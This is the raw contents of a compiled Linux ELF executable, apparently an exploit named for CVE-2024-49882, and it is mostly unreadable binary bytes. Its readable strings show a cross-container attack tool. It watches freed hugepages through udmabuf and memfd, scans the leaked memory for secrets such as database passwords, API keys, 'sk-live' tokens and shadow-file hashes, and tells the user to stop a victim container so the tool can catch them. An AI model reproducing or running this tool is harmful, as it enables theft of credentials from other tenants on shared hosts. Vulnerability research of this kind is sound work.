ELF

>
�@(t@8
@'&@@@��

x
x


   D	D	
-==��-==�
�
88800hhhDDS�td88800P�td0'0'0'\\Q�tdR�td-==
/lib64/ld-linux-x86-64.so.2 GNU���
GNU
7[Fk5��]���{�F�
GNU
�
(��e�m)�3
 .>�i�R��
��O
 \��KDdc^
 p~��@�"putcputs__stack_chk_fail__printf_chkfree__isoc23_fscanffcntlmunmapfflushftruncatememmemfopenstrlen__ctype_b_locusleepstdoutmalloc__libc_start_main__cxa_finalizefcloseioctlsignalmemcpysyscallmmaplibc.so.6GLIBC_2.3GLIBC_2.3.4GLIBC_2.14GLIBC_2.4GLIBC_2.38GLIBC_2.34GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable



�ii
�ti	�����ii

���
���
ui	'
=�=�@@ @� (@� 0@� 8@� @@� H@� P@� X@� `@� h@� p@� x@� �@� �@!�@!�?�?�?�?�?�@?
 ?(?0?8?@?H?	P?
X?`?h?
p?x?�?�?�?�?�?�?�?�?�?�?�?��H��H��/H��t��H����5�.�%�.@��h���f���h
����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h	�R���f���h
�B���f���h�2���f���h�"���f���h
����f���h����f���h��f���h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f����%>.fD���%N-fD���%F-fD���%>-fD���%6-fD���%.-fD���%&-fD���%-fD���%-fD���%-fD���%-fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD��AWH�=�AVL�5�AUL�-)ATL�%�U�����S1�H��(dH�%(H�D$1��V���H�=G�J���H�=��>���H�=��2���H�=3�&���H�=g����H�=�����H�=�����H�=����H�5�����H�=������,����L��L������D$I��H��t'H��H�T$1�L�������
t�D$L������L$9�t
~	�������1��:H��H��t?D�{
H��'1�D�8
��H��dH9�u�	~��H�|$�@H�|$����D��i�)\��P���=(\��
���P����*+���*���H�=I���H�=������+H�5�1������H�=�����{+1�����H�T$dH+%(��H��([]A\A]A^A_�H�5t�1�����d��*��tP1��'H��H��t<D�{
H��'1�f��8
��H��dH9�u�	~��H�|$�0
H�|$���D����
u��L$���1��n����4���@��1�I��^H��H���PTE1�1�H�=1�����)�f.�H�=y*H�r*H9�tH��)H��t	�����H�=I*H�5B*H)�H��H��?H��H
�H�tH�u)H��t��fD�����=
*u+UH�=R)H��tH�=V)����d�����)
]������w�������")ÐAWAVAUATUSH��H�)�t$H����
I��H�-)E1���H�]H��H���7
H������H�ھ L��H���L���H��t�L)�H�=�H���u���H�=�	�i���H�=
�]���H�U�1�H�5o�V����T$H��1�H�5&
��<���H�=U
� ���H�=W������� H9�HC�H���
H9�HG�L��8���I9�sQ�$���M
�L
�I���f���
t��uoI��
I9�t&A�I�H��DH
@t�H�5f(I��
�-���I9�u�H�=�H��A��
���H�]�E(
H������H��D��[]A\A]A^A_�fDH�5(�.�����{���E1���ff.�f���AV�T�?
H�5yAUATUSH�� dH�%(H�D$1�������
H�þ ��A���@������1��	�����H�=&1������Ņ���fo�
��H��1��Bu@�$�D$D$�������E1�A���
�
� 1����I��H���th� �.���I��H��t� L��H������� L���)�������������D�����H�D$dH+%(u<H�� L��[]A\A]A^����i������b���D���Z���E1���D���I���������f���H��H��'1Ҁ8
��H��dH9�u�	~���1��@��SH�5�H�=%H��dH�%(H�D$1����H��t.H��H��H�T$1�H�5��D$�.�����
t!H���Q���H�D$dH+%(u4H��[��
�%�T$�1�H�5�����H�=�%������(�����H��H���
🔥  Pattern: %-45s🔥
--- Leaked Data ---
--- End ---
leak/dev/udmabufr%dINSTRUCTIONS:   sudo docker stop victim_db4. Press Ctrl+C to stop
POSTGRES_PASSWORDCTF_FLAGFLAG{SECRETAPI_KEYsk-livepostgresPGPASSWORDroot:daemon::$6$:$y$COVERT_MSGMAGIC_DATA🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥  CROSS-CONTAINER SECRET LEAKED!                      🔥🔥  Attempt: %-5d  Offset: 0x%-8zx                   🔥
🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥
/sys/kernel/mm/hugepages/hugepages-2048kB/free_hugepages
[*] Free hugepages: %-4d | Secrets found: %-4d | Press Ctrl+C to stop╔══════════════════════════════════════════════════════════════╗║  CVE-2024-49882: Cross-Container Hugepage Data Channel       ║╚══════════════════════════════════════════════════════════════╝
1. This exploit runs continuously, watching for freed hugepages2. In another terminal, STOP the victim container:3. Watch this terminal - it should catch secrets![*] Starting continuous leak monitoring...
║  RESULTS: Found %d secrets                                  ║
╚══════════════════════════════════════════════════════════════╝

[!] HUGEPAGES RELEASED! %d -> %d (grabbing them now!)

 
;\
�����������
��x��������H
��
 �

zR
x
�
@�&D$4X��
FJw�?9*3$"\��t���
���H����
B�B�B �B(�A0�A8�DPv

8D0A(B BBBG@�0�n
F�S�B �A(�A0�DP

0D(A BBBD0
\�, D
x�E�R \
ADHh
D��F�I�I �I(�H0�F8�F`�

8A0A(B BBBA��
�
�==���o���
x
?@8�@	���o
���ox���o
�o8���o=0@P`p�������� 0@P`p���@
� � � � � � � � � � � � � !!GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0<�@��
,_'
&�6
p
u-D

O
	"R

Q
i.int/lm
*=
�-6��
���
�=
�

X"�#�1R
3l�6	��7	�8	��9	� �
:	�(?;	�0O<	�8]=	�@@	�H�A	�P%B	�X>Dk`Fph�Hlp}IltE
J�x
MR��N^�-Ou�FQ��I
Y
��/
[���\���]p��
^	D�8_
*��
`l�Sb��	�0+�

f
���6
^,

��
���6
��
R�1���
�
Y
k
��2o

x!
�3=/
cu
����F �@�d

��
\\Ho
t4l#�
��
 �

!�J

"�
#�W
&s	@�
'l	�@��6�.
�	 @�
�
l&�5�
�
9D
XcTlc��lj�7�l��6n�
el���*
����8
4l�l�Ldl�l�7�O#

�0�
D,�*�*�
�
*C�8�+lc�lVl~�l$�
%$�#�
Ll�D*�D�*�9D�D*lll��*ll6�
f
llQ
�l:lls
lVl��

C�n�%��l@�
��
G�	l�
�	l]Q �l	f����&7�l����D�� 
�i�l��9�K��D�����0��




>
8
![
Y
,m
i
7
�<�
�
�l

U��

Ts���&���3�
��
�
�
�
�
�
!�
�
,�
�
7�g<�l

U��

Ts1[
���@p�

U
2

T	�&

Qv#��

U}

T~E�	

U

T|

Q��ZT+	

Uv��&�^	

U
���
1�
���	@64��

U	#1����	@JH��

U	�#1���G
@^\��

U	 $1����
@rp��

U	W 1����
@����

U	�$1���.@����

U	(%1���{@����

U	e 1����@����

U	`%1���@����

U	� 1�
��b@���

U	�%1�
���@����

U	> 1����@�

U	#1�N
@&$�

U
2

T	�%1��
@><+�

U	&�9�


U
2

T	���:�
}P�
��f~�ZT ��&7�l�d1�
��
d@us��

U
2

T	�"���

Us

T	T 

Q�d�T�

Us�j|��

U	�"

T	R ��'*
Rl
��
RDG
R lpS�MT	l~W	l;FiXli^l�_�offa*�l*endm*jo*
K%�6D�n

���7	l���=	l��<c
@��dmaA	l���DDQGD<8�
=�RP�b`&C

U	E 

T
2��
�H�$zx�����

U|

T~

Q@A$�V

U
?


T	@ 

QT::

U}

T@A$^

Us

T
	

Q
2Y��

Uv

TBu@

Q����

U
0

T@A$

Q
1

R
1

Xs

Y
0���

U@A$���

U~

T@A$�	

Us�!

Uv�9

U}�Q

Us�i

Uv�

U}�

Us�=x

)�
��>sig
)l
U!+)l�?)��)l!?D1
F�
��
*!TlN2T �'$
R
ll?__cRl(���

�\����)!),*FG]M*P(Q��\E ]h-+s<:1f
bc
Y@KIk�

U	> 1kkd
�@_]w�

U	!1wwe
�@wu��

U	�!1��f
E@����

U
2

T	 1��g
�@����

U
2

T	�!

Q���

Rs1��h
�@����

U	"1��k
@@����

U	 ~r���N3
�p4�_��C�N�
�q%�_��

U.��@1H
�
s
@\�

U	2 A,8

UsT

U|

T@A$

Qs(� ,
��/)QKsmA!,��7��<��BIl	�
��
╔══════════════════════════════════════════════════════════════╗
+
	
	H�F║  CVE-2024-49882: Cross-Container Hugepage Data Channel       ║
	�
��
╚══════════════════════════════════════════════════════════════╝

	�INSTRUCTIONS:
	C�A1. This exploit runs continuously, watching for freed hugepages
	6�42. In another terminal, STOP the victim container:
	!�   sudo docker stop victim_db
	5�33. Watch this terminal - it should catch secrets!
	�4. Press Ctrl+C to stop

	/�-[*] Starting continuous leak monitoring...

	�

C��+?5	B�@🔥  CROSS-CONTAINER SECRET LEAKED!                      🔥
	u�s🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥

	�--- Leaked Data ---
	�
--- End ---


I~I1�B
:;9I8H
}

1R
�B
X!
YW
H
}

41�B	6
!IH}
:;9I
$>.
?:;9'I<
.
?:;9'I<
(4:!
;9I�B:;9I4:!
;9I
1U
7I(4:!
;9I�B
1R
�BUX!
YW
4:!
;9I
<

I
!I/4:!
;9I? 
U
!.
?:;9!
'I !4
"&I#
:;9!
$.?:!;9!
'<%.
?:!
;9I
@z
&4:!
;9!
I'.
?:;9'I 
(.
1
@z
)41*
1U+.?<n:!;!,
%U
-.$>/5I0:;914:;9I?<2&3
>I:;9
4
'
5.
?:;9'<
6.
?:;9n'I<
7.?:;9'I<8.
?:;9n'I<
9

:.
?:;9
@z
;

<4:;9I=.
?:;9'
@z
>:;9I?:;9I@
1R
�BUXYWA41BH}
�
C.?<n��


�








Dg���
�
�
�





&
-
4

C
�L
U

c
l
s
|
�
�
�
	�(

K

�&.

t

�tt
J	v.#
�




J
J	�

��
<	Y

Y 

u<
 t
>
q


X



p


�



o


�



n


f



m


�



l


�



i


�


4
Y4Wuts
u
&

Y�<#�Y
.H&

�

#�4t
b



&
t
eJX
.
&


\
a




|J
aJX



h
Jt#h



�

%
vt
a


X
	
b g���
Y
��Y0
l

J
	

�
�tW�
X/
�
�=
h
�=

X
R




�
-
�uu�

u#
+
t;tI�
s

�&
t-

.)v
K



	�0 

"e

�

 �vY�J�
Y
	�
�s	�


X	]�

z�
R


�

.
�


	@�


Lf
4t(�
I


X
6

H


�
7

G


�
9

E


�
:

D


�
;

C


�
<

B


�
=

A


�
>

@


�
�

�


�
�

	

��	=

Y
�
�1
X9


�	�
J
K!



�
	2
	�

Y�J



	sv 

"e

�
X
�
W	@
�	��[
(�
�


�
�

�


�
�

�


�
�

�


�
�
$

�]#

�


J
�

)


�
�
)�
�"
�
Y�J



	sL 

"e

�
X�
W<;)


X
��



printf__off_t_ISgraphmalloc_chainsize_t_shortbuffree_hp__path_ISspace_IO_buf_base__sighandler_tlong long unsigned intaddr__src__open_too_many_argsstdout_ISalpha_ISdigitlong long int__oflagprint_free_hugepages_IO_read_endusleep_fileno_flags__builtin_puts_cur_columnputchar_IO_codecvt__printf_chk_old_offsetfcntlkeep_running_ISblank__uint32_thandle_signallast_free_ISpuncttotal_secrets_IO_marker_freeres_bufstrlen__open_missing_mode_IO_write_ptrmunmapsyscall__useconds_tsizeshort unsigned int_IO_save_basecheck_page__builtin_memcpy_lockputccopy__open_2GNU C17 13.3.0 -mtune=generic -march=x86-64 -g -O2 -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection_IO_read_ptrmatch__dest_IO_lock_t_IO_FILE__uint64_tfopenmemmemfflush_markersattemptunsigned char_IO_buf_endshort intftruncate_flags2__len_vtable_offsetmmap__stack_chk_failudmabufmemfd__ctype_b_locpatterns_IScntrl_ISxdigit_ISlowerfcloseioctludmabuf_create__off64_t_IO_read_base_IO_save_end__fmt__pad5_IO_write_endfound_unused2_ISalnum__isoc23_fscanf_ISuppernon_zero_IO_backup_base__open_alias_freeres_listleak_hugepage_IO_wide_datastartmain_IO_write_base_ISprintexploit_debug.c/home/vlad/Desktop/convert_channel_bug_exploitation/usr/include/x86_64-linux-gnu/bits/usr/lib/gcc/x86_64-linux-gnu/13/include/usr/include/x86_64-linux-gnu/bits/types/usr/include/usr/include/x86_64-linux-gnu/sysstdio2.hstdio.hfcntl2.hstring_fortified.hstddef.htypes.hstruct_FILE.hstdint-uintn.hsignal.hunistd.hstdio2-decl.hstring.hmman.hstdlib.hioctl.hfcntl.h<built-in>ctype.h�0�{
S{�

_�
�

S��
S��
_��
S
	��f
Vfh��h�

V��
V��
V.
P
U?
_��
_y
P6
U6<��p0��
P3
U39���0
S�	
P	*
U*0���	
P	*
U*0���00��	0�	*
Q�	0��3
S�	
P	-
U-3���	
P	-
U-3���30��	0�	-
Q�	0�
[
�&�
�������������������N��q���
���
������
�%�
 $�|
P3
SIw
S
� 
�"�

�
P�

]��
]��
]

(
P0
U0�

V�
�

V�
�

P�
�

V

[#
P#r
S�
�

S
�
PK
^kt
Ptu
^
�
P8
\
2�

E �
�@A$�
�
^
�
P
\�1
U1�
\���
U���
\��
U�1
T1�����
T
�10�1�
]��}���
]��
]��0�


�10�11v @3%�1@v @3%#
�@Iv(@3%#
�I�v @3%���v(@3%���v @3%���0�!
P3;
Pf
P~
S~�
s�|��

_
�
S
f��k
"�w��
 ��
�!���T����

_
3u��
�.�
H�� (
U()�
U�),
U (
T()�
T�),
T
$$
U$%�
U�%(
U$0�$
Q%(
Q$0�:
�,8���9�������Y�
�
�����\
�V�
�
3H$
�+DoF?D�
���[pb���@�
�	
� �#��
5�@ BPU�k
�@
w
=���
=5��
@)��
=�0'�
?	

7
 S
�@I @f
�
�
�
�@�
�
��
�
�
�'9�n
�
G@T ,_p�� ��@�� ��
�@P�M�&' @�0�@<O@�Tm@{z��@� ��@�"���Scrt1.o__abi_tagexploit_debug.ccheck_page.part.0crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entry__FRAME_END___DYNAMIC__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE_free@GLIBC_2.2.5__libc_start_main@GLIBC_2.34_ITM_deregisterTMCloneTablestdout@GLIBC_2.2.5__isoc23_fscanf@GLIBC_2.38puts@GLIBC_2.2.5fcntl@GLIBC_2.2.5_edatafclose@GLIBC_2.2.5_finistrlen@GLIBC_2.2.5__stack_chk_fail@GLIBC_2.4mmap@GLIBC_2.2.5handle_signalftruncate@GLIBC_2.2.5ioctl@GLIBC_2.2.5leak_hugepage__data_startcheck_pageputc@GLIBC_2.2.5signal@GLIBC_2.2.5syscall@GLIBC_2.2.5__gmon_start__memmem@GLIBC_2.2.5__dso_handlememcpy@GLIBC_2.14_IO_stdin_usedmalloc@GLIBC_2.2.5fflush@GLIBC_2.2.5_endprint_free_hugepagespatterns__bss_startmunmap@GLIBC_2.2.5main__printf_chk@GLIBC_2.3.4keep_runningfopen@GLIBC_2.2.5__TMC_END___ITM_registerTMCloneTabletotal_secrets__cxa_finalize@GLIBC_2.2.5_init__ctype_b_loc@GLIBC_2.3usleep@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str.debug_line_str.debug_loclists.debug_rnglists

#8806hh$I�� W���o��(a���
i��x

q���o88>~���oxx�
���@�B88@�
�
  �
�
���
���
�
@@��
��
�
  0�
0'0'\�
�'�'�
�=-�=-�=-�
�
?/


@0� 
�@�0

0�0+



�0@
)

1�
5

M�
C

�P�
O

0�X�

Z

0�]�


j

._�
z

�f>


0h`%	�n
�r�